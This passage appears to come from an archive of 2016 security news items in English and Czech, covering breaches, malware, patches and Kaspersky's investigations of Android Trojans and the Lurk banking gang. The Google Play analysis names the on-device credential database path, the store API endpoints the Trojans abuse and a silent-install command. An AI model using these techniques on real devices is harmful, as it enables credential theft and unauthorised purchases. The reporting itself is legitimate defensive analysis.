Nově vytvořená společnost Barkly zase uvádí, že pracuje na agentovi pro koncové body, který místně analyzuje situaci koncového bodu a automaticky blokuje škodlivé aktivity. O vykonaných akcích také informuje příslušného správce.
Tyto stroje potřebují připojení k větším zdrojům zpráv o hrozbách, kde jsou informace o charakteristice útoků z hlediska jejich šíření a o aktivitách vedoucích k narušení bez použití kódu, který by bylo možné označit jako malware, uvádí Abrams.
Většina z toho, co se ví o funkcích detekce v rámci koncového bodu a nástrojích reakce, je to, co o jejich schopnostech říkají ti, kdo je i vytvářejí. Pokud je to tedy možné, měli by potenciální zájemci použít zkušební verze, aby si funkce a efektivitu osobně ověřili ještě před nákupem. „Nevýhodou vznikajících technologií je, že nejsou dostatečně otestované,“ upozorňuje i Pingree.
Náprava
Nástroje detekce v koncovém bodu sbírají velké množství dat, která lze takticky použít k zastavení útoků, ale také k podpoře forenzního vyšetřování vývoje událostí – od průniků až po exploity. To může pomoci zjistit, jaká zařízení potřebují ošetření, a někteří dodavatelé se snaží tento proces zautomatizovat...
Azerbaijani Anti-Armenia Team of hacktivists leaked Armenian security service data
3.9.2016 securityaffairs BigBrothers
Azerbaijani Anti-Armenia Team of hacktivists leaked Armenian security service data and passport details of foreign visitors to Armenia.
A group of Azerbaijani hacktivists has leaked the passport details of foreign visitors to Armenia.
The data breach exposed the Internal resources of the Security Service (SNS) that are involved in the process of updating information about passports of foreign passports.
The hackers breached Armenian government servers stealing sensitive data, including passport scans. Intelligence experts who analyzed the data leaks confirmed their authenticity.
The Anti-Armenia Team took credit for a series of data leaks that the hackers claim were stolen from servers of Armenian national security ministry.
“We would like to notice that Anti – Armenia team is an independent group, who is active for five years and repeatedly makes anxious Armenian side by its cyber attacks,” the group explained to El Reg.
Armenia and Azerbaijan are neighbouring countries that engaged a war over the disputed Nagorno-Karabakh region between 1988 and 1994.
There is a great tension between the two countries, in April, the Azerbaijani army tried to regain control of the Nagorno-Karabakh Republic, but the battle caused the death of 350 people.
A source that has spoken to El Reg on condition of anonymity told to El Reg the leaked information is more likely to have come from an insider, excluding that the alleged Anti–Armenia team has hacked on Armenian government systems.
“I am familiar with the incident, and [can] confirm, that such attacks really happened, and the documents are legitimate and not fake,” the source told el Reg. “I have more confidence that one of their employees having access to it has been compromised and technical border control service is a part of SNS (Security Service), that’s why there is such overlap, and the documents could be stolen from particular person, and not ‘systems’, like they claim.”
The notorious Hacker Guccifer sentenced 52 months in US prison
3.9.2016 securityaffairs Crime
The notorious Romanian hacker Guccifer has been sentenced to 52 months in prison by a US court for aggravated identity theft and hacking.
The notorious Romanian hacker Guccifer has been sentenced to prison by a US court.
Marcel Lehel Lazar (44), this is the real name of Guccifer, has been sentenced to 52 months in prison for aggravated identity theft and hacking into to a protected computer.
Guccifer was arrested in January 2014 in Romania, where he was known to law enforcement for hacking into the accounts of local celebrities. In June 2014 he was pleading guilty and sentenced by a Romanian court to 7 years in prison for accessing the email accounts of the head of the Romanian intelligence service, George Maior, and of the politician Corina Cretu.
In March 2016, the Romanian authorities accepted the US request for Lazar’s extradition.
Guccifer is very popular in the hacking community, but he became famous to the public after hacking the online accounts of numerous public figures, including members of the Bush family, journalists, actors, former members of the U.S. Cabinet and the U.S. Joint Chiefs of Staff, former Secretary of State Colin Powell, the senior political member Sidney Blumenthal and a former presidential advisor.
Lazar also claimed to have hacked the Hillary Clinton’s private email server, in the past months he had a series of interviews with Fox and NBC News outlets, providing details about his intrusion.
Guccifer exploited Clinton’s connection with Blumenthal to access her email server.
Lazar first got into Blumenthal’s AOL email, in March 2013, through detailed Internet research to help him guess Blumenthal’s security question. From Blumenthal’s email, Lazar was then able to track emails based on IP headers and ultimately gain access to the Clinton email server.
Lazar described the server to NBC News (from a Bucharest jail cell) as, ‘an open orchid on the Internet’ where he was able to find ‘hundreds of folders’. While he says he only accessed the server twice, he claims to have obtained 2-gigabytes of information. He has thus far refused to provide any of the emails to which he gained access. Of the 2-gigabytes of information, he has told Fox News they are hidden because they are ‘too hot’ and ‘a matter of national security’.
Guccifer hacked Hillary Clinton email server
Source The Telegraph
It has been of concern about who has had access to the Clinton email server. Lazar has said he was able to see ‘up to 10,…, IPs from other parts of the world.’ Research into emails during Clinton’s time as Secretary of State has already shown approximately 2,200 emails that contained classified information, with some identified as “Top Secret”.
According to US authorities, the hacker admitted having hacked email and social media accounts of roughly 100 Americans between October 2012 and January 2014.
Kali Linux 2016.2 — Download Latest Release Of Best Operating System For Hackers
2.9.2016 thehackernews OS
As promised at the Black Hat and Def Con security and hacking conferences, Offensive Security – the creators of Swiss army knife for researchers, penetration testers, and hackers – has finally released the much awaited Kali Linux 2016.2.
Kali Linux is an open-source Debian-based Linux distribution designed to help ethical hackers and security professionals with a wide range of tools for penetration testing, forensics, hacking and reverse engineering together into a single package.
Earlier the Kali Linux distribution was known as BackTrack.
Kali Linux 2016.2 is an updated Live ISO image of the popular GNU/Linux distribution that includes the latest software versions and enhancements for those who want to deploy the operating system on new systems.
What's new?
Besides bringing the updated Live ISOs of Kali Linux, the Kali Linux team brings multiple variants of the GNU/Linux distribution with various Desktop Environments, specifically KDE, Xfce, MATE, LXDE, and Enlightenment – all available only for 64-bit platforms.
What's even more exciting is that, from Kali Linux 2016.2 onwards, the team promises to release updated Live ISO images of Kali with new software versions and the latest security patches every week.
Since Kali Linux has been the most advanced and widely used distro for penetration testing and forensics, this weekly update has come up as exciting news for those involved in various hacking and security-related projects.
It's been several months since the last update to the official Kali Linux Live ISOs, and there are a few hundred new or updated packages pushed to the Kali repositories.
This means that the packages incorporated in the previous Kali Linux ISOs need bug fixes and OS improvements, which are implemented in the most recent versions of the Linux distro.
"Since our last release several months ago, there's a few hundred new or updated packages which have been pushed to the Kali reports," the Kali Linux team's announcement reads. "This means that anyone downloading an ISO even 3 months old has somewhat of a long 'apt-get dist-upgrade' ahead of them."
You can download the latest Kali Linux 2016.2 ISOs from its official website now. The Kali Linux team has also promised to bring a lot of exciting announcements in the next few weeks, so keep an eye on its announcements for the latest updates.
Experti z CZ.NIC objevili díky routerům Turris potenciální botnet, který útočí na stařičký Telnet
2.9.2016 Zive.cz BotNet
Majitelé experimentálních routerů Turris si na nich mohou aktivovat vábničky, které otevřou TCP porty pro komunikaci skrze terminály SSH a Telnet. Útočník ale ve skutečnosti nebude kompromitovat váš router, ten jej totiž mezi tím už dávno přesměroval na serveru CZ.NIC.
Pokud máte router Turris a zapojíte jej do systému vábniček (honeypotů) CZ.NIC, sami se můžete podívat, kdo se pokouší dostat na SSH skrze port 22 na vaší IP adrese a jaké příkazy zkouší. Zpravidla jsou stejné, protože je řídí nějaký botnet/automat.
V každém případě platí, že CZ.NIC, který routery Turris provozuje, má k dispozici zajímavá čísla, ke kterým se ostatně dostanou i ostatní členové komunity.
Experti na jaře objevili obrovský skok v útocích na stařičký Telnet, který je přitom spíše na ústupu. Objem útoků byl natolik velký a náhlý, že začali zkoumat zákeřné IP adresy a s pomocí Shodanu zjistili, že se ve velké míře jedná o všemožná zařízení IoT počínaje bezpečnostními kamerami připojenými k internetu a konče multimediálními přehrávači a domácími Wi-Fi routery.
Roboti zdaleka neútočí jen na SSH, zájem o stařičký Telnet je stále obrovský (graf vlevo má logaritmické měřítko). V květnu se nejspíše ozval botnet, který zneužil internet věcí.
Zdá se tedy, že na jaře začal aktivně útočit na stařičký Telnet některý z velkých botnetů, který zneužívá zranitelností v síťových krabičkách, dostane se do jejich nitra a pokouší se skrze ně přihlašovat na Telnet napříč celým spektrem IP adres, do kterého se dostali i majitelé routerů Turris.
Pokud provozujete zařízení připojené k internetu, můžete si bezpečnost jeho IP adresy ověřit pomocí tohoto nástroje od CZ.NICu. Zjistíte, jestli IP adresa náhodou nefiguruje na seznamu útočníků, který ale pochopitelně nemusí být kompletní.
Hey, Music Lovers! Last.Fm Hack Leaks 43 Million Account Passwords
2.9.2016 THEHACKERNEWS Social
Another Day, Another Data Breach!
If you love to listen to music online and have an account on Last.fm website, your account details may have compromised in a data breach that leaked more than 43 Million user personal data online.
Last.fm was hacked in March of 2012 and three months after the breach, London-based music streaming service admitted to the incident and issued a warning, encouraging its users to change their passwords.
But now it turns out that the Last.fm data breach was massive, and four years later the stolen data have surfaced in the public.
The copy of the hacked database obtained by the data breach indexing website LeakedSource contained 43,570,999 user records that were originally stolen from Last.fm on March 22, 2012, according to timestamps in the database.
The leaked records include usernames, hashed passwords, email addresses, the date when a user signed up to the website, and ad-related data.
Wait! Have you visited The Hacker News early this week? We reported about the Dropbox massive data breach that had also occurred in 2012, which let hackers get their hands on online cloud storage accounts of more than 68 Million users.
People Are Still So Bad At Picking Passwords
But what makes the Last.fm hack much worse is the weak security measures the website used to store its users’ passwords.
Lat.fm stored its users’ passwords using MD5 hashing – which has been considered outdated even before 2012 – and that too without any Salt, a random string added to strengthen encrypted passwords that make it more difficult for hackers to crack them.
LeakedSource says it took them just 2 hours to crack 96% of all the passwords included in the Last.fm data dump, which is possible due to the use of an unsalted MD5 hashing system to store passwords.
"This algorithm is so insecure it took us two hours to crack and convert over 96 percent of them to visible passwords," LeakedSource said in its blog post. adding that it recently significantly invested in its own "password cracking capabilities for the benefit of our users."
And guess what? Last.fm's analysis of the password reveals that the most popular passwords users kept securing their accounts were extremely weak.
255,319 people used the phrase 123456
92,652 used 'password' as password
Almost 67,000 used 'lastfm'
Around 64,000 used 123456789
46,000 used 'qwerty'
Almost 36,000 used 'abc123'
LeakedSource added the data into its database; so if you have a Last.fm account, you can check if it has been compromised by searching your data at Leaked Source’s search engine.
Last.fm is the latest to join the list of "Mega-Breaches," that revealed in recent months, when hundreds of Millions of online credentials from years-old data breaches on popular social network sites, including LinkedIn, MySpace, VK.com and Tumblr, were sold on the Dark Web.
The takeaway:
Change your passwords for Last.fm account as well as other online accounts immediately, especially if you are using the same password for multiple sites.
Moreover, make use of a good password manager to create complex passwords for different websites and remember them.
We have listed some of the best password managers that could help you understand the importance of password manager as well as choose one according to your requirement.
Update your Mac OS X — Apple has released Important Security Updates
2.9.2016 THEHACKERNEWS Apple
If you own a Mac laptop or desktop, you need to update your system right now.
It turns out that the critical zero-day security vulnerabilities disclosed last week, which targeted iPhone and iPad users, affect Mac users as well.
Late last week, Apple rolled out iOS 9.3.5 update to patch a total of three zero-day vulnerabilities that hackers could have used to remotely gain control of an iPhone by simply making the victim click a link.
Dubbed "Trident," the security holes were used to create spyware (surveillance malware) called 'Pegasus' that was apparently used to target human rights activist Ahmed Mansoor in the United Arab Emirates.
Pegasus could allow an attacker to access an incredible amount of data on a target victim, including text messages, calendar entries, emails, WhatsApp messages, user's location, microphone.
Pegasus Spyware could even allow an attacker to fully download victim's passwords and steal the stored list of WiFi networks, as well as passwords the device connected to.
Apple is now patching the same "Trident" bugs in Safari web browser on its desktop operating system, with urgent security updates for Safari 9 as well as OS X Yosemite and OS X El Capitan.
However, this is not a surprise because iOS and OS X, and mobile and desktop version of Safari browser share much of the same codebase. Therefore, zero-days in Apple’s iOS showed up in OS X as well.
Pegasus exploit takes advantage of Trident bugs to remotely jailbreak and install a collection of spying software onto a victim's device, without the user’s knowledge.
One of the key tools of the exploit takes advantage of a memory corruption bug in Safari WebKit, allowing hackers to deliver the malicious payload when a target victim clicks on a malicious link and initiate the process of overtaking the operating system.
In an advisory, Apple warned that visiting a "maliciously crafted website" via Safari browser could allow attackers to execute arbitrary code on a victim's computer.
The patch updates that Apple released on Thursday fix the nasty Trident bugs, including CVE-2016-4654, CVE-2016-4655, and CVE-2016-4656, which were initially discovered and reported by mobile security startup Lookout and the University of Toronto’s Citizen Lab.
Based on a link sent to UAE human rights activist Ahmed Mansoor, Lookout Security, and Citizen Lab traced the three programming blunders and its Pegasus spyware kit to Israeli "cyber war" organization NSO Group, which sells hacking exploits to governments like the UAE.
Users can install security patches for Safari, El Capitan, and Yosemite via the usual software update mechanisms.
BitTorrent client Transmission found distributing Mac malware once again
2.9.2016 securityaffairs Virus
It has happened again, Mac users who were looking for the BitTorrent client Transmission might have been infected by the OSX/Keydnap malware.
Security experts from ESET have spotted the popular BitTorrent client called Transmission distributing Mac malware called OSX/Keydnap that is used to steal the content of OS X’s keychain and maintain a permanent backdoor on victims’PC. This is the second time that the BitTorrent client Transmission has been used to deliver a malicious code. In March the researchers from Palo Alto Networks Unit 42 discovered a malicious campaign reported by Apple customers who were looking for the latest version of Transmission that were infected with a new family of Ransomware that was specifically designed to target OS X installations.
“On March 4, we detected that the Transmission BitTorrent ailient installer for OS X was infected with ransomware, just a few hours after installers were initially posted. We have named this Ransomware “KeRanger.” states the report published by Palo Alto Networks.
The researchers named this new Ransomware family KeRanger, they also released a technical analysis of the malware.
Back to the present, researchers at ESET discovered that the Keydnap malware was spread through the official Transmission website.
“During the last hours, OSX/Keydnap was distributed on a trusted website, which turned out to be “something else”. It spread via a recompiled version of the otherwise legitimate open source BitTorrent client application Transmission and distributed on their official website.” reads the blog post published by ESET.
Transmission has promptly removed the malicious version from the download section, anyway, users who downloaded the client between Sunday and Monday should check if their machine has been comprised.
The Keydnap malware could be used by crooks to establish a backdoor on the compromised machine that can allow them to execute remote commands on the Mac.
Two attacks leveraging the BitTorrent client Transmission, is it a coincidence?
Malware researchers from ESET noted many similarities between the two attacks, for example in both cases the malicious code was added to the main function of the BitTorrent client Transmission. Also in this case, the OSX/Keydnap malicious code was signed with a legitimate code signing key that allows the crooks to bypass the Gatekeeper protection system.
“In both cases, a malicious block of code is added to the main function of the Transmission application,” ESET said. “The code responsible for dropping and running the malicious payload is astonishingly the same. Just like in the KeRanger case, a legitimate code signing key was used to sign the malicious Transmission application bundle. It’s different from the legitimate Transmission certificate, but is still signed by Apple and bypasses Gatekeeper protection.”
Experts speculate the Transmission website has been hacked, the attackers uploaded the malicious version of the BitTorrent client Transmission.ESET has notified Apple about the compromised developer certificate.
Experts from ESET has notified Apple about the compromised developer certificate.
SWIFT discloses more cyber attacks on its bank members and urges more security
2.9.2016 securityaffairs Security
SWIFT discloses more attacks against banks worldwide, pressures banks on security and urged member banks to implement the new SWIFT software by November 19.
In the last months, a worrisome string of attacks against banks worldwide through the SWIFT system has alarmed the banking industry. The so-called “SWIFT hackers” have conducted multiple cyber attacks against financial institutions. We reported the successful cyber heists on the Bangladesh bank, against a Ukrainian bank, and the Ecuadorian bank, meanwhile, a Vietnam bank reported to have blocked an ongoing cyber heist.
In May, a fourth Bank in the Philippines was a victim of the SWIFT hackers and the experts at Symantec confirmed the malware used by the crooks shares code with tools used by the notorious Lazarus group linked to the North Korean Government.
According to the Reuters agency, the SWIFT issued a new warning urging member banks to implement the new SWIFT software by 19 November.
The latest version of SWIFT’s software implements new security features specifically designed to defeat such kind of attacks.The authentication processes have been improved such as the implementation of mechanisms to early detect fraudulent activities.
“Customers’ environments have been compromised, and subsequent attempts (were) made to send fraudulent payment instructions. The threat is persistent, adaptive and sophisticated – and it is here to stay.” states the SWIFT.
The organization hasn’t provided further details on the alleged additional cyber attacks against banks worldwide.
“All the victims shared one thing in common,” says Reuters: “Weaknesses in local security that attackers exploited to compromise local networks and send fraudulent messages requesting money transfers.”
The SWIFT logo is pictured in this photo illustration taken April 26, 2016. REUTERS/Carlo Allegri/Illustration/File Photo
SWIFT told banks that it might report the incident to regulators and banking partners if they failed to adopt the new SWFT software.
Despite the efforts of the SWIFT, many experts speculate that the new security features are not enough to consider completely secure the banking systems.
Of course, the cyber attacks have prompted regulators globally to press financial institution to bolster their security defenses.
Roughly 43 Million Last.fm accounts were stolen in a 2012 security breach'
2.9.2016 securityaffairs Crime
According to the breach notification service LeakedSource roughly 43 million Last.fm accounts were compromised in a 2012 incident.
In June 2012, the online music service Last.fm was compromised by hackers, in response the company notified the incident to its users inviting them to change their passwords.
Some experts speculated the security breach took place several months earlier.
The company was using the MD5 hashing algorithm with no salt to protect passwords, which is known to be weak security implementation, for this reason, Last.fm also announced some improvements for the storage of the passwords.
“We are currently investigating the leak of some Last.fm user passwords. This follows recent password leaks on other sites, as well as information posted online. As a precautionary measure, we’re asking all our users to change their passwords immediately.” states the Last.fm Password Security Update.
“We strongly recommend that your new Last.fm password is different to the password you use on other services.”
The real number of impacted users was not disclosed at the time of the data breach, but now we know more about the incident. According to the breach notification service LeakedSource roughly 43 million accounts were compromised in the incident.
The leaked records include usernames, passwords, email addresses, dates of registration and some other internal data.
“Music service Last.fm was hacked on March 22nd, 2012 for a total of 43,570,999 users. This data set was provided to us by daykalif@xmpp.jp and Last.fm already knows about the breach but the data is just becoming public now like all the others.” reported LeakedSource.
“Each record contains a username, email address, password, join date, and some other internal data. We verified the legitimacy of this data set with Softpedia reporter Catalin C who was in the breach himself along with his colleagues.”
According to LeakedSource, its experts managed to crack 96 percent of the unsalted MD5 hashes within a couple of hours.
Below the top 10 passwords:
The revelation about the Last.fm data breach arrives a couple of days after Dropbox confirmed that hackers stole 68 million accounts in 2012.
Unfortunately, the list of data breaches is very long and includes other IT giants, such as LinkedIn, MySpace, VK.com and Tumblr.
How Trojans manipulate Google Play
1.9.2016 Kaspersky Android
For malware writers, Google Play is the promised land of sorts. Once there, a malicious application gains access to a wide audience, gains the trust of that audience and experiences a degree of leniency from the security systems built into operating systems. On mobile devices, users typically cannot install applications coming from sources other than the official store, meaning this is a serious barrier for an app with malicious intent. However, it is far from easy for the app to get into Google Play: one of the main conditions for it is to pass a rigorous check for unwanted behavior by different analysis systems, both automatic and manual.
Some malware writers have given up on their efforts to push their malicious creations past security checks, and instead learned how to use the store’s client app for their unscrupulous gains. Lately, we have seen many Trojans use the Google Play app during promotion campaigns to download, install and launch apps on smartphones without the owners’ knowledge, as well as leave comments and rate apps. The apps installed by the Trojan do not typically cause direct damage to the user, but the victim may have to pay for the created excessive traffic. In addition, the Trojans may download and install paid apps as if they were free ones, further adding to the users’ bills.
Let us look into the methods how such manipulations with Google Play happen.
Level 1. N00b
The first method is to make the official Google Play app store undertake the actions the cybercriminal wants. The idea is to use the Trojan to launch the client, open the page of the required app in it, then search for and use special code to interact with the interface elements (buttons) to cause download, installation and launch of the application. The misused interface elements are outlined with red boxes in the screenshots below:
The exact methods of interaction with the interface vary. In general, the following techniques may be identified:
Use of the Accessibility services of the operating system (used by modules in Trojan.AndroidOS.Ztorg).
Imitation of user input (used by Trojan-Clicker.AndroidOS.Gopl.c).
Code injection into the process of Google Play client to modify its operation (used by Trojan.AndroidOS.Iop).
To see how such Trojans operate. Let us look at the example of Trojan.AndroidOS.Ztorg.n. This malicious program uses Accessibility services originally intended to create applications to help people with disabilities, such as GUI voice control apps. The Trojan receives a job from the command and control server (C&C) which contains a link to the required application, opens it in Google Play, and then launches the following code:
This code is needed to detect when the required interface element appears on the screen, and to emulate the click on it. This way, the following buttons are clicked in a sequence: “BUY” (the price is shown in the button), “ACCEPT” and “CONTINUE”. This is sufficient to purchase the app, if the user has a credit card with sufficient balance connected to his/her Google account.
Level 2. Pro
Some malware writers take roads less traveled. Instead of using the easy and reliable way described above, they create their own client for the app store using HTTPS API.
The difficult part about this approach is that the operation of the self-made client requires information (e.g. user credentials and authentication tokens) which is not available to a regular app. However, the cybercriminals are very fortunate that all required data are stored on the device in clear text, in the convenient SQLite format. Access to the data is limited by the Android security model, however apps may abuse it e.g. by rooting the device and thus gaining unlimited access.
For example, some versions of the Trojan.AndroidOS.Guerrilla.a have their own client for Google Play, which is distributed with the help of the rooter Leech. This client successfully fulfils the task of downloading and installing free and paid apps, and is capable of rating apps and leaving comments in the Google store.
After launch, Guerrilla starts to collect the following required information:
The credentials to the user’s Google Play account.
Activities in Google Play require special tokens that are generated when the user logs in. When the user is already logged in to Google Play, the Trojan can use the locally cached tokens. They can be located through a simple search through the database located at /data/system/users/0/accounts.db:
With the help of the code below, the Trojan checks if there are ready tokens on the infected device, i.e. if the user has logged on and can do activities in Google Play:
If no such tokens are available, the Trojan obtains the user’s username and hashed password, and authenticates via OAuth:
Android_id is the device’s unique ID.
Google Service Framework ID is the device’s identifier across Google services.
First, the Trojans attempts to obtain this ID using regular methods. If these fail for whatever reason, it executes the following code:
Google Advertising ID is the unique advertising ID provided by Google Play services.
Guerrilla obtains it as follows:
In a similar way, the Trojan obtains hashed data about the device from the file “/data/data/com.google.android.gms/shared_prefs/Checkin.xml“.
When the Trojan has collected the above data, it begins to receive tasks to download and install apps. Below is the structure of one such task:
The Trojan downloads the application by sending POST requests using the links below:
https://android.clients.google.com/fdfe/search: a search is undertaken for the request sent by the cybercriminals. This request is needed to simulate the user’s interaction with the Google Play client. (The main scenario of installing apps from the official client presupposes that the user first does the search request and only then visits the app’s page).
https://android.clients.google.com/fdfe/details: with this request, additional information needed to download the app is collected.
https://android.clients.google.com/fdfe/purchase: the token and purchase details are downloaded, used in the next request.
https://android.clients.google.com/fdfe/delivery: the Trojan receives the URL and the cookie-files required to download the Android application package (APK) file.
https://android.clients.google.com/fdfe/log: the download is confirmed (so the download counter is incremented.)
https://android.clients.google.com/fdfe/addReview: the app is rated and a comment is added.
When creating the requests, the cybercriminals attempted to simulate most accurately the equivalent requests sent by the official client. For example, the below set of HTTP headers is used in each request:
After the request is executed, the app may (optionally) get downloaded, installed (using the command ‘pm install -r’ which allows for installation of applications without the user’s consent) and launched.
Conclusion
The Trojans that use the Google Play app to download, install and launch apps from the store to a smartphone without the device owner’s consent are typically distributed by rooters – malicious programs which have already gained the highest possible privileges on the device. It is this particular fact that allows them to launch such attacks on the Google Play client app.
This type of malicious program pose a serious threat: in Q2 2016, different rooters occupied more than a half of the Top 20 of mobile malware. All the more so, rooters can download not only malicious programs that compromise the Android ecosystem and spend the user’s money on purchasing unnecessary paid apps, but other malware as well.
The Hunt for Lurk
1.9.2016 Kaspersky Virus
In early June, 2016, the Russian police arrested the alleged members of the criminal group known as Lurk. The police suspected Lurk of stealing nearly three billion rubles, using malicious software to systematically withdraw large sums of money from the accounts of commercial organizations, including banks. For Kaspersky Lab, these arrests marked the culmination of a six-year investigation by the company’s Computer Incidents Investigation team. We are pleased that the police authorities were able to put the wealth of information we accumulated to good use: to detain suspects and, most importantly, to put an end to the theft. We ourselves gained more knowledge from this investigation than from any other. This article is an attempt to share this experience with other experts, particularly the IT security specialists in companies and financial institutions that increasingly find themselves the targets of cyber-attacks.
When we first encountered Lurk, in 2011, it was a nameless Trojan. It all started when we became aware of a number of incidents at several Russian banks that had resulted in the theft of large sums of money from customers. To steal the money, the unknown criminals used a hidden malicious program that was able to interact automatically with the financial institution’s remote banking service (RBS) software; replacing bank details in payment orders generated by an accountant at the attacked organization, or even generating such orders by itself.
In 2016, it is hard to imagine banking software that does not demand some form of additional authentication, but things were different back in 2011. In most cases, the attackers only had to infect the computer on which the RBS software was installed in order to start stealing the cash. Russia’s banking system, like those of many other countries, was unprepared for such attacks, and cybercriminals were quick to exploit the security gap.
We participated in the investigation of several incidents involving the nameless malware, and sent samples to our malware analysts. They created a signature to see if any other infections involving it had been registered, and discovered something very unusual: our internal malware naming system insisted that what we were looking at was a Trojan that could be used for many things (spamming, for example) but not stealing money.
Our detection systems suggest that a program with a certain set of functions can sometimes be mistaken for something completely different. In the case of this particular program the cause was slightly different: an investigation revealed that it had been detected by a “common” signature because it was doing nothing that could lead the system to include it in any specific group, for example, that of banking Trojans.
Whatever the reason, the fact remained that the malicious program was used for the theft of money.
So we decided to take a closer look at the malware. The first attempts to understand how the program worked gave our analysts nothing. Regardless of whether it was launched on a virtual or a real machine, it behaved in the same way: it didn’t do anything. This is how the program, and later the group behind it, got its name. To “lurk” means to hide, generally with the intention of ambush.
We were soon able to help investigate another incident involving Lurk. This time we got a chance to explore the image of the attacked computer. There, in addition to the familiar malicious program, we found a .dll file with which the main executable file could interact. This was our first piece of evidence that Lurk had a modular structure.
Later discoveries suggest that, in 2011, Lurk was still at an early stage of development. It was formed of just two components, a number that would grow considerably over the coming years.
The additional file we uncovered did little to clarify the nature of Lurk. It was clear that it was a Trojan targeting RBS and that it was used in a relatively small number of incidents. In 2011, attacks on such systems were starting to grow in popularity. Other, similar, programs were already known about, the earliest detected as far back as in 2006, with new malware appearing regularly since then. These included ZeuS, SpyEye, and Carberp, etc. In this series, Lurk represented yet another dangerous piece of malware.
It was extremely difficult to make Lurk work in a lab environment. New versions of the program appeared only rarely, so we had few opportunities to investigate new incidents involving Lurk. A combination of these factors influenced our decision to postpone our active investigation into this program and turn our attention to more urgent tasks.
A change of leader
For about a year after we first met Lurk, we heard little about it. It later turned out that the incidents involving this malicious program were buried in the huge amount of similar incidents involving other malware. In May 2011, the source code of ZeuS had been published on the Web and this resulted in the emergence of many program modifications developed by small groups of cybercriminals.
In addition to ZeuS, there were a number of other unique financial malware programs. In Russia, there were several relatively large cybercriminal groups engaged in financial theft via attacks on RBS. Carberp was the most active among them. At the end of March 2012, the majority of its members were arrested by the police. This event significantly affected the Russian cybercriminal world as the gang had stolen hundreds of millions of rubles during a few years of activity, and was considered a “leader” among cybercriminals. However, by the time of the arrests, Carberp’s reputation as a major player was already waning. There was a new challenger for the crown.
A few weeks before the arrests, the sites of a number of major Russian media, such as the agency “RIA Novosti”, Gazeta.ru and others, had been subjected to a watering hole attack. The unknown cybercriminals behind this attack distributed their malware by exploiting a vulnerability in the websites’ banner exchange system. A visitor to the site would be redirected to a fraudulent page containing a Java exploit. Successful exploitation of the vulnerability initiated the launch of a malicious program whose main function was collecting information on the attacked computer, sending it to a malicious server, and in some cases receiving and installing an extra load from the server.
The code on the main page of RIA.ru that is used to download additional content from AdFox.ru
From a technical perspective, the malicious program was unusual. Unlike most other malware, it left no traces on the hard drive of the system attacked and worked only in the RAM of the machine. This approach is not often used in malware, primarily because the resulting infection is “short-lived”: malware exists in the system only until the computer is restarted, at which point the process of infection need to be started anew. But, in the case of these attacks, the secret “bodiless” malicious program did not have to gain a foothold in the victim’s system. Its primary job was to explore; its secondary role was to download and install additional malware. Another fascinating detail was the fact that the malware was only downloaded in a small number of cases, when the victim computer turned out to be “interesting”.
Part of the Lurk code responsible for downloading additional modules
Analysis of the bodiless malicious program showed that it was “interested” in computers with remote banking software installed. More specifically, RBS software created by Russian developers. Much later we learned that this unnamed, bodiless module was a mini, one of the malicious programs which used Lurk. But at the time we were not sure whether the Lurk we had known since 2011, and the Lurk discovered in 2012, were created by the same people. We had two hypotheses: either Lurk was a program written for sale, and both the 2011 and 2012 versions were the result of the activity of two different groups, which had each bought the program from the author; or the 2012 version was a modification of the previously known Trojan.
The second hypothesis turned out to be correct.
Invisible war with banking software
A small digression. Remote banking systems consist of two main parts: the bank and the client. The client part is a small program that allows the user (usually an accountant) to remotely manage their organization’s accounts. There are only a few developers of such software in Russia, so any Russian organization that uses RBS relies on software developed by one of these companies. For cybercriminal groups specializing in attacks on RBS, this limited range of options plays straight into their hands.
In April 2013, a year after we found the “bodiless” Lurk module, the Russian cybercriminal underground exploited several families of malicious software that specialized in attacks on banking software. Almost all operated in a similar way: during the exploration stage they found out whether the attacked computer had the necessary banking software installed. If it did, the malware downloaded additional modules, including ones allowing for the automatic creation of unauthorized payment orders, changing details in legal payment orders, etc. This level of automation became possible because the cybercriminals had thoroughly studied how the banking software operated and “tailored” their malicious software modules to a specific banking solution.
The people behind the creation and distribution of Lurk had done exactly the same: studying the client component of the banking software and modifying their malware accordingly. In fact, they created an illegal add-on to the legal RBS product.
Through the information exchanges used by people in the security industry, we learned that several Russian banks were struggling with malicious programs created specifically to attack a particular type of legal banking software. Some of them were having to release weekly patches to customers. These updates would fix the immediate security problems, but the mysterious hackers “on the other side” would quickly release a new version of malware that bypassed the upgraded protection created by the authors of the banking programs.
It should be understood that this type of work – reverse-engineering a professional banking product – cannot easily be undertaken by an amateur hacker. In addition, the task is tedious and time-consuming and not the kind to be performed with great enthusiasm. It would need a team of specialists. But who in their right mind would openly take up illegal work, and who might have the money to finance such activities? In trying to answer these questions, we eventually came to the conclusion that every version of Lurk probably had an organized group of cybersecurity specialists behind it.
The relative lull of 2011-2012 was followed by a steady increase in notifications of Lurk-based incidents resulting in the theft of money. Due to the fact that affected organizations turned to us for help, we were able to collect ever more information about the malware. By the end of 2013, the information obtained from studying hard drive images of attacked computers as well as data available from public sources, enabled us to build a rough picture of a group of Internet users who appeared to be associated with Lurk.
This was not an easy task. The people behind Lurk were pretty good at anonymizing their activity on the network. For example, they were actively using encryption in everyday communication, as well as false data for domain registration, services for anonymous registration, etc. In other words, it was not as easy as simply looking someone up on “Vkontakte” or Facebook using the name from Whois, which can happen with other, less professional groups of cybercriminals, such as Koobface. The Lurk gang did not make such blunders. Yet mistakes, seemingly insignificant and rare, still occurred. And when they did, we caught them.
Not wishing to give away free lessons in how to run a conspiracy, I will not provide examples of these mistakes, but their analysis allowed us to build a pretty clear picture of the key characteristics of the gang. We realized that we were dealing with a group of about 15 people (although by the time it was shut down, the number of “regular” members had risen to 40). This team provided the so-called “full cycle” of malware development, delivery and monetization – rather like a small, software development company. At that time the “company” had two key “products”: the malicious program, Lurk, and a huge botnet of computers infected with it. The malicious program had its own team of developers, responsible for developing new functions, searching for ways to “interact” with RBS systems, providing stable performance and fulfilling other tasks. They were supported by a team of testers who checked the program performance in different environments. The botnet also had its own team (administrators, operators, money flow manager, and other partners working with the bots via the administration panel) who ensured the operation of the command and control (C&C) servers and protected them from detection and interception.
Developing and maintaining this class of malicious software requires professionals and the leaders of the group hunted for them on job search sites. Examples of such vacancies are covered in my article about Russian financial cybercrime. The description of the vacancy did not mention the illegality of the work on offer. At the interview, the “employer” would question candidates about their moral principles: applicants were told what kind of work they would be expected to do, and why. Those who agreed got in.
A fraudster has advertised a job vacancy for java / flash specialists on a popular Ukrainian website. The job requirements include a good level of programming skills in Java, Flash, knowledge of JVM / AVM specifications, and others. The organizer offers remote work and full employment with a salary of $2,500.
